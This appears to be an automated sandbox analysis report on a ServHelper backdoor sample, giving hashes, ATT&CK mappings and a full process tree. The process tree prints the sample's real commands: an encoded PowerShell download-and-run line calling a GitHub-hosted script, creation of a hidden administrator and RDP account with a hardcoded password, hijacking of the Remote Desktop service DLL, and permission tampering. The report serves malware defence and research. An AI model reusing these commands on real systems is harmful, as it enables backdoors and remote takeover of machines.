servhelper | 2214bdc78b558176a17484bcc02079a5470e0b49073d50d19b522d67dc4396e3

Analysis

max time kernel
137s
max time network
82s
platform
windows7_x64
resource
win7v20210410
submitted
30-07-2021 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Size

9.2MB
MD5

5e12e56a643c71b913ea60f48f28726d
SHA1

8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
SHA256

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
SHA512

807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3

Score

10^/10

servhelper backdoor bootkit discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 1 IoCs

flow	pid	Process
12	2564	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
852	ViJoy.exe
848	exe2.exe
1384	exe1.exe
992	NFWCHK.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
280	icacls.exe
1852	icacls.exe
2000	icacls.exe
1528	icacls.exe
1468	takeown.exe
1912	icacls.exe
1592	icacls.exe
1652	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral26/files/0x0004000000013189-206.dat	upx
behavioral26/files/0x000500000001318a-207.dat	upx

Deletes itself 1 IoCs

pid	Process
1720	powershell.exe

Loads dropped DLL 7 IoCs

pid	Process
852	ViJoy.exe
852	ViJoy.exe
852	ViJoy.exe
848	exe2.exe
1916	Process not Found
1916	Process not Found
1264	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1592	icacls.exe
1652	icacls.exe
280	icacls.exe
1852	icacls.exe
2000	icacls.exe
1528	icacls.exe
1468	takeown.exe
1912	icacls.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	exe2.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a74ffc7-9cca-4845-bd46-8ff96c4ac43f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0b142a5-2b59-45fd-a99b-ce1f142c850f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55dbdebd-e428-42e4-82e2-2ef0cdfc7458	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd10f91-0b5f-40f7-b451-e272660bae5d	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac761484-0ecd-4b05-83ec-285cc54d0e96	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90ab2bf7-a5b2-485f-bbb1-f5e3aeea5b24	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578ff6f3-25c8-4688-81c3-ff3e7179e5c3	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z2QY7QFOTGMKT0BUNU70.temp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0bb34e5-3a6d-4514-8e04-07c75cc5c314	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abd106a9-f5f6-41e9-b78b-a62c298b662f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c4a40091-f455-420c-bbdd-90c865751b3b	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c695c2dd-95c9-457e-b147-d950bcde996e	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	exe2.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bafa925785d701	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1468	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1720	powershell.exe
1720	powershell.exe
2032	powershell.exe
2032	powershell.exe
432	powershell.exe
432	powershell.exe
1528	powershell.exe
1528	powershell.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
2564	powershell.exe
2564	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
464	Process not Found
1916	Process not Found
1916	Process not Found
1916	Process not Found
1916	Process not Found

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeRestorePrivilege	1592	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2428	WMIC.exe
Token: SeAuditPrivilege	2428	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2428	WMIC.exe
Token: SeAuditPrivilege	2428	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeAuditPrivilege	2488	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeAuditPrivilege	2488	WMIC.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
848	exe2.exe
848	exe2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	26
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	26
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	26
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	26
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 848	852	ViJoy.exe	28
PID 852 wrote to memory of 1384	852	ViJoy.exe	29
PID 852 wrote to memory of 1384	852	ViJoy.exe	29
PID 852 wrote to memory of 1384	852	ViJoy.exe	29
PID 852 wrote to memory of 1384	852	ViJoy.exe	29
PID 848 wrote to memory of 992	848	exe2.exe	33
PID 848 wrote to memory of 992	848	exe2.exe	33
PID 848 wrote to memory of 992	848	exe2.exe	33
PID 848 wrote to memory of 992	848	exe2.exe	33
PID 1384 wrote to memory of 1720	1384	exe1.exe	35
PID 1384 wrote to memory of 1720	1384	exe1.exe	35
PID 1384 wrote to memory of 1720	1384	exe1.exe	35
PID 1720 wrote to memory of 432	1720	powershell.exe	37
PID 1720 wrote to memory of 432	1720	powershell.exe	37
PID 1720 wrote to memory of 432	1720	powershell.exe	37
PID 432 wrote to memory of 1500	432	csc.exe	38
PID 432 wrote to memory of 1500	432	csc.exe	38
PID 432 wrote to memory of 1500	432	csc.exe	38
PID 1720 wrote to memory of 2032	1720	powershell.exe	39
PID 1720 wrote to memory of 2032	1720	powershell.exe	39
PID 1720 wrote to memory of 2032	1720	powershell.exe	39
PID 1720 wrote to memory of 432	1720	powershell.exe	41
PID 1720 wrote to memory of 432	1720	powershell.exe	41
PID 1720 wrote to memory of 432	1720	powershell.exe	41
PID 1720 wrote to memory of 1528	1720	powershell.exe	43
PID 1720 wrote to memory of 1528	1720	powershell.exe	43
PID 1720 wrote to memory of 1528	1720	powershell.exe	43
PID 1720 wrote to memory of 1468	1720	powershell.exe	46
PID 1720 wrote to memory of 1468	1720	powershell.exe	46
PID 1720 wrote to memory of 1468	1720	powershell.exe	46
PID 1720 wrote to memory of 1912	1720	powershell.exe	47
PID 1720 wrote to memory of 1912	1720	powershell.exe	47
PID 1720 wrote to memory of 1912	1720	powershell.exe	47
PID 1720 wrote to memory of 1592	1720	powershell.exe	48
PID 1720 wrote to memory of 1592	1720	powershell.exe	48
PID 1720 wrote to memory of 1592	1720	powershell.exe	48
PID 1720 wrote to memory of 1652	1720	powershell.exe	49
PID 1720 wrote to memory of 1652	1720	powershell.exe	49
PID 1720 wrote to memory of 1652	1720	powershell.exe	49
PID 1720 wrote to memory of 280	1720	powershell.exe	50
PID 1720 wrote to memory of 280	1720	powershell.exe	50
PID 1720 wrote to memory of 280	1720	powershell.exe	50
PID 1720 wrote to memory of 1852	1720	powershell.exe	51
PID 1720 wrote to memory of 1852	1720	powershell.exe	51
PID 1720 wrote to memory of 1852	1720	powershell.exe	51
PID 1720 wrote to memory of 2000	1720	powershell.exe	52
PID 1720 wrote to memory of 2000	1720	powershell.exe	52
PID 1720 wrote to memory of 2000	1720	powershell.exe	52
PID 1720 wrote to memory of 1528	1720	powershell.exe	53
PID 1720 wrote to memory of 1528	1720	powershell.exe	53
PID 1720 wrote to memory of 1528	1720	powershell.exe	53
PID 1720 wrote to memory of 964	1720	powershell.exe	54
PID 1720 wrote to memory of 964	1720	powershell.exe	54
PID 1720 wrote to memory of 964	1720	powershell.exe	54

C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:308
- C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
  "C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
    "C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:848
  - - C:\Users\Public\Documents\Wondershare\NFWCHK.exe
      C:\Users\Public\Documents\Wondershare\NFWCHK.exe
      4⤵
      Executes dropped EXE
      PID:992
- - C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
    "C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      4⤵
      Deletes itself
      Drops file in System32 directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1720
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:432
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp" "c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP"
        6⤵
        
        PID:1500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
    - - C:\Windows\system32\takeown.exe
        
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1468
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1912
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1652
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:280
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1852
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2000
    - - C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1528
    - - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        5⤵
        
        PID:964
    - - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        5⤵
        Modifies registry key
        
        PID:1468
    - - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        5⤵
        
        PID:1912
    - - C:\Windows\system32\net.exe
        
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:1556
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        6⤵
        
        PID:1616
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        5⤵
        
        PID:1852
      - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        6⤵
        
        PID:952
        
        C:\Windows\system32\net.exe
        
        net start rdpdr
        7⤵
        
        PID:1988
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        8⤵
        
        PID:1784
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        5⤵
        
        PID:2028
      - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        6⤵
        
        PID:1912
        
        C:\Windows\system32\net.exe
        
        net start TermService
        7⤵
        
        PID:1840
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        8⤵
        
        PID:1144
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        5⤵
        
        PID:2828
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        5⤵
        
        PID:2840

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1344
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:2000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2056

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT /add
1⤵
PID:2068
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc bu4XEaZT /add
  2⤵
  PID:2092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add
    3⤵
    PID:2104

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2128
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2164

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
1⤵
PID:2192
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
  2⤵
  PID:2216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
    3⤵
    PID:2228

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2252
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2288

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT
1⤵
PID:2320
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc bu4XEaZT
  2⤵
  PID:2344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT
    3⤵
    PID:2356

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2384
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2428

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2464
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2488

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2528
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Bootkit

T1067

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/308-59-0x0000000001220000-0x0000000001221000-memory.dmp

Filesize
4KB

Download
memory/308-61-0x00000000010E0000-0x00000000010E2000-memory.dmp

Filesize
8KB

Download
memory/432-160-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/432-154-0x000000001ABF0000-0x000000001ABF2000-memory.dmp

Filesize
8KB

Download
memory/432-155-0x000000001ABF4000-0x000000001ABF6000-memory.dmp

Filesize
8KB

Download
memory/432-156-0x0000000002300000-0x0000000002301000-memory.dmp

Filesize
4KB

Download
memory/432-158-0x000000001B520000-0x000000001B521000-memory.dmp

Filesize
4KB

Download
memory/432-161-0x00000000024B0000-0x00000000024B1000-memory.dmp

Filesize
4KB

Download
memory/848-74-0x0000000075A31000-0x0000000075A33000-memory.dmp

Filesize
8KB

Download
memory/852-68-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/852-65-0x0000000000E50000-0x0000000000E51000-memory.dmp

Filesize
4KB

Download
memory/852-67-0x0000000000420000-0x0000000000451000-memory.dmp

Filesize
196KB

Download
memory/992-90-0x000007FEEA850000-0x000007FEEB8E6000-memory.dmp

Filesize
16.6MB

Download
memory/992-95-0x0000000001FC0000-0x0000000001FC2000-memory.dmp

Filesize
8KB

Download
memory/1384-82-0x0000000041056000-0x0000000041057000-memory.dmp

Filesize
4KB

Download
memory/1384-81-0x0000000041054000-0x0000000041056000-memory.dmp

Filesize
8KB

Download
memory/1384-78-0x0000000041580000-0x000000004182A000-memory.dmp

Filesize
2.7MB

Download
memory/1384-80-0x0000000041052000-0x0000000041054000-memory.dmp

Filesize
8KB

Download
memory/1384-83-0x0000000041057000-0x0000000041058000-memory.dmp

Filesize
4KB

Download
memory/1528-176-0x0000000002394000-0x0000000002396000-memory.dmp

Filesize
8KB

Download
memory/1528-175-0x0000000002390000-0x0000000002392000-memory.dmp

Filesize
8KB

Download
memory/1720-96-0x000000001ADD0000-0x000000001ADD2000-memory.dmp

Filesize
8KB

Download
memory/1720-94-0x000000001AE50000-0x000000001AE51000-memory.dmp

Filesize
4KB

Download
memory/1720-92-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

Filesize
8KB

Download
memory/1720-128-0x000000001ADDA000-0x000000001ADF9000-memory.dmp

Filesize
124KB

Download
memory/1720-97-0x000000001ADD4000-0x000000001ADD6000-memory.dmp

Filesize
8KB

Download
memory/1720-93-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/1720-98-0x0000000001ED0000-0x0000000001ED1000-memory.dmp

Filesize
4KB

Download
memory/1720-99-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1720-101-0x000000001C530000-0x000000001C531000-memory.dmp

Filesize
4KB

Download
memory/1720-109-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1720-111-0x000000001AC50000-0x000000001AC51000-memory.dmp

Filesize
4KB

Download
memory/1720-112-0x000000001C1F0000-0x000000001C1F1000-memory.dmp

Filesize
4KB

Download
memory/1720-113-0x0000000002890000-0x0000000002891000-memory.dmp

Filesize
4KB

Download
memory/2032-122-0x0000000002310000-0x0000000002311000-memory.dmp

Filesize
4KB

Download
memory/2032-126-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/2032-124-0x000000001B870000-0x000000001B871000-memory.dmp

Filesize
4KB

Download
memory/2032-121-0x000000001AB84000-0x000000001AB86000-memory.dmp

Filesize
8KB

Download
memory/2032-120-0x000000001AB80000-0x000000001AB82000-memory.dmp

Filesize
8KB

Download
memory/2032-147-0x000000001B520000-0x000000001B521000-memory.dmp

Filesize
4KB

Download
memory/2032-133-0x000000001B5B0000-0x000000001B5B1000-memory.dmp

Filesize
4KB

Download
memory/2032-146-0x000000001B510000-0x000000001B511000-memory.dmp

Filesize
4KB

Download
